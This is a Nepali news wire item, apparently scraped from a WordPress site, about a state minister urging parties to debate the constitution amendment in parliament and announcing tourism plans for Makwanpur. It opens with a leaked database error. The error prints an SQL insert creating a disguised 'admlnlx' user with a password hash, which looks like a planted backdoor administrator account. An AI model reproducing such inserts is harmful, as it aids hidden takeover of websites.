WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BSn8D4GgU.WBTtoxQ9o2r8dW9grWUZ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 08:03:17', '', 'admlnlx', 'admlnlx')
हेटौ्रडा, मंसिर १८–
संस्कृति, पर्यटन तथा नागरिक उड्डयन राज्यमन्त्री इन्द्रबहादुर बानियाँले प्रमुख दल सडकमा ढुङ्गामुढा र टायर बालेर होइन संसद्मा संसदीय प्रक्रियाबाट संविधान संशोधनको प्रस्तावमा छलफल गर्नु पर्ने बताएका छन्।
राज्यमन्त्री बानियाँले नेपाली काँग्रेस मकवानपुरद्वारा आज उनको सम्मानमा आयोजित एक स्वागत कार्यक्रममा राष्ट्रमा अहिले संविधानको कार्यान्वयनलाई चुनौती थपिएको बेलामा प्रमुख दलहरूले जिम्मेवारीपूर्वक आफ्ना भनाइ प्रस्तुत गर्न सक्नुपर्ने बताए।
उनले मुलुकको राष्ट्र अखण्डतालाई बलियो बनाउँदै अब संविधान कार्यान्वयन गरी स्थानीय निर्वाचन गराउने तर्फ दलहरू जुट्नुपर्ने आवश्यकता औँल्याए।
राज्यमन्त्री बानियाँले मकवानपुरगढी, चिसापानीगढी र सीमभञ्याङ् र दामन पर्यटन विकासका लागि गुरुयोजना लागू गरी पर्यटन विकासलाई थप विस्तार गर्ने सरकारको लक्ष्य रहेको बताए। –रासस